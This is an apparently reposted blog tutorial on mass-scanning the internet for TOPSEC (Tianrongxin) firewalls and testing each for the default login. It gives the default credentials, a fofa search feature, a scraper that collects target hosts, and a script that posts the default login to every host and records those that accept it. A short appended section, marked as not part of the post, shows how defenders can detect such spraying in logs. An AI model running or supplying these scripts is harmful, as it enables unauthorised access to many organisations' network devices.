How to quickly find weak passwords across the whole network: you are only this far from being a hacker

Foreword: In a test, I encountered a Tianrongxin firewall. The weak-password test failed. In addition, Tianrongxin firewalls generally lock the login after five failed attempts, so weak passwords cannot be brute-forced. In practice there are still many of these systems. This article describes how to use fofa to crawl servers running the same system across the whole network, and then how to write a script that batch-checks the default username and password. It takes the weak password of the TOPSEC firewall as an example.

The idea is to use fofa to search for a feature unique to the target system, such as a page specific to that system, have a script crawl and collect the matching links, and then use a second script to batch-check the default username and password.

(After having this idea, I searched Baidu. Others have already written fofa link-crawling scripts, so rather than reinvent the wheel I adapted and streamlined one. The code is relatively simple and the original author wrote it well. Original link: https://www.cnblogs.com/Cl0ud/p/12384457.html)

Preliminary preparation

One: Log in to a fofa member account. Non-members can only view five pages of results. To crawl all the links that match the feature you need a membership, and an ordinary membership is enough. You need to arrange this yourself. After logging in, obtain the cookie value of the logged-in account for later use when crawling links.

Two: Find the characteristic URL of the target firewall: "/cgi/maincgi.cgi". Search for it on fofa to find the same target system. The q parameter can be deleted from the resulting link, as long as the qbase64 parameter stays the same: https://fofa.so/result?qbase64=Ii9jZ2kvbWFpbmNnaS5jZ2ki. What we need is the qbase64 value: Ii9jZ2kvbWFpbmNnaS5jZ2ki

Three: All of the links are the firewall's back-end login page, which shows a login box for an account and password. Enter the default account (username:password → superman:talent), click log in, and capture the request packet.

With the preparation done, the next step is to write scripts that crawl the links to be tested and verify them in batches. To make later changes easier, crawling and weak-password detection are split into two scripts.

Script part (divided into link crawling and batch detection)

The environment required for the script is python2

fofa link crawling script

Encoding problems were really annoying and produced all kinds of errors, so the script output is in English. The cookie and qbase64 values are written directly into the code; modify them yourself when you use it.

import requests
from lxml import etree
import re
import time

cookie = "1"
qbase64 = "Ii9jZ2kvbWFpbmNnaS5jZ2ki"
def spider():
    header = {
        "Connection": "keep-alive",
        "Cookie": "_fofapro_ars_session=" + cookie,
    }
    print("spider website is :https://fofa.so/result?qbase64=" + qbase64)
    html = requests.get(url="https://fofa.so/result?qbase64=" + qbase64, headers=header).text
    pagenum = re.findall('>(\d*)</a> <a class="next_page" rel="next"', html)
    print("have page: " + pagenum[0])
    stop_page = raw_input("please input stop page: \n")
    doc = open("url.txt", "a+")
    for i in range(1, int(pagenum[0])):
        print("Now write " + str(i) + " page")
        pageurl = requests.get('https://fofa.so/result?page=' + str(i) + '&qbase64=' + qbase64, headers=header)
        tree = etree.HTML(pageurl.text)
        urllist = tree.xpath('/html/body/div[@id="result"]/div[@class="main-result clearfix padTop90"]/div[@class="result-right-list"]/div[@class="result-right-list-view"]/div[@class="right-list-view-item clearfix"]/div[@class="fl box-sizing"]/div[@class="re-domain"]/a[@target="_blank"]/@href')
        for j in urllist:
            doc.write(j + "\n")
        if i == int(stop_page):
            break
        time.sleep(10)
    doc.close()
    print("OK,Spider is End .")

def main():
    spider()

if __name__ == '__main__':
    main()

In the preparation we obtained the cookie of the logged-in fofa user and the qbase64 parameter of our search. Modify the cookie and qbase64 values in the code above, run it with python scriptname.py, enter the page number to stop at, and wait for the run to finish. Afterwards, the url.txt file in the same directory contains the collected target system URLs. A screenshot of the run is shown below.

Batch detection script

import requests
import time
payload = {
    "username":"superman",
    "passwd":"talent",
    "loginSubmitIpt":''
}
'''proxy='127.0.0.1:1080'
proxies={
    'http':'http://' + proxy,
    'https':'https://' + proxy
}'''
header={'Connection': 'close'}
f = open("url.txt", "r")
r = open("url_x.txt","w")
lines = f.readlines()
i=0
x=0
for line in lines:
    try:
        response = requests.post(line+"/cgi/maincgi.cgi?Url=Index",data = payload,headers = header,timeout=5,verify=False)
    except:
        continue
    else:
        i=i+1
        print(str(i))
        if "maincgi.cgi?Url=Main" in (response.text.replace(u'\xa9', u'')):
            r.write(line + "\n")
            x=x+1
            print(str(i)+"is being detected")
            print("A vulnerability link has been detected" + str(x))
f.close()
r.close()

Without try there is an error, as shown in the figure below. I searched Baidu, and the methods found online did not resolve it. In testing, some links raise exceptions and some are fine, so we use try to skip the failing requests. If anyone has a solution, suggestions are welcome.

After the script starts, it reads the links in url.txt and checks the default password against each one, printing the index of the link currently being checked. When a system with the weak password is detected, it prints the number detected so far.

Links to systems detected with the weak password are also output and saved in url_x.txt, as shown below:

After running the script for a while, the results came out: essentially the network-wide set of Tianrongxin systems with the default password, as shown in the following figure:

That is the idea: batch crawling, then batch testing. There are more ways to use it that I won't go into; you can modify the code to suit your needs. There are still many shortcomings, and I look forward to your opinions and suggestions.
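
Seen from the defender's side, the batch check sends a single login POST to each host, so the five-failure lockout never fires on any one device and the activity only stands out when requests are aggregated by source across hosts. The following added example (not part of the original post) does that aggregation over constructed perimeter log lines; the log format, the function names and the `min_hosts` threshold are assumptions.

```python
from collections import defaultdict

LOGIN_PATH = "/cgi/maincgi.cgi"  # login endpoint named in the article

# Constructed sample lines in an assumed format (not a real product's log):
# timestamp source_ip destination_host method request_uri status
SAMPLE_LOG = """\
2021-03-24T10:00:01Z 203.0.113.7 fw-a.example.net POST /cgi/maincgi.cgi?Url=Index 200
2021-03-24T10:00:12Z 203.0.113.7 fw-b.example.net POST /cgi/maincgi.cgi?Url=Index 200
2021-03-24T10:00:23Z 203.0.113.7 fw-c.example.net POST /cgi/maincgi.cgi?Url=Index 200
2021-03-24T10:05:00Z 198.51.100.20 fw-a.example.net POST /cgi/maincgi.cgi?Url=Index 200
2021-03-24T10:05:40Z 198.51.100.20 fw-a.example.net GET /cgi/maincgi.cgi?Url=Main 200
2021-03-24T10:06:00Z 192.0.2.9 www.example.net GET /index.html 200
this line is malformed
"""


def parse_line(line):
    """Return (source, host, method, path) or None for a malformed line."""
    parts = line.split()
    if len(parts) != 6:
        return None
    _ts, src, host, method, uri, _status = parts
    return src, host, method.upper(), uri.split("?", 1)[0]


def find_login_sprays(log_text, min_hosts=3):
    """Map each source to the hosts whose login endpoint it POSTed to,
    keeping only sources that touched at least min_hosts distinct hosts."""
    hosts_by_source = defaultdict(set)
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue  # skip lines that do not match the assumed format
        src, host, method, path = record
        if method == "POST" and path == LOGIN_PATH:
            hosts_by_source[src].add(host)
    return {
        src: sorted(hosts)
        for src, hosts in hosts_by_source.items()
        if len(hosts) >= min_hosts
    }


if __name__ == "__main__":
    for src, hosts in find_login_sprays(SAMPLE_LOG).items():
        print(f"{src} posted to the login page of {len(hosts)} hosts: {hosts}")
```

A source that logs in to one device, like the administrator address in the sample, stays below the threshold, while the source that touches every firewall once is reported.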

Origin blog.csdn.net/pyjishu/article/details/115178934